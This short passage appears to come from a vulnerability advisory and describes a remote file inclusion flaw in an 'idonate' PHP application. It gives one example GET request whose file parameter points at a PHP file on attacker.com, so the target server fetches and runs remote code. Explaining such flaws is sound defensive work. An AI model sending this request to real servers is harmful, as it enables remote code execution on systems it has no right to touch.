An attacker can manipulate the filename to include a file from a remote server. An attacker could send a GET request with a maliciously crafted filename:

GET /idonate/index.php?file=http://attacker.com/malicious_file.php HTTP/1.1
Host: target.example.com

In this example, `http://attacker.com/malicious_file.php` is the attacker-controlled PHP file.
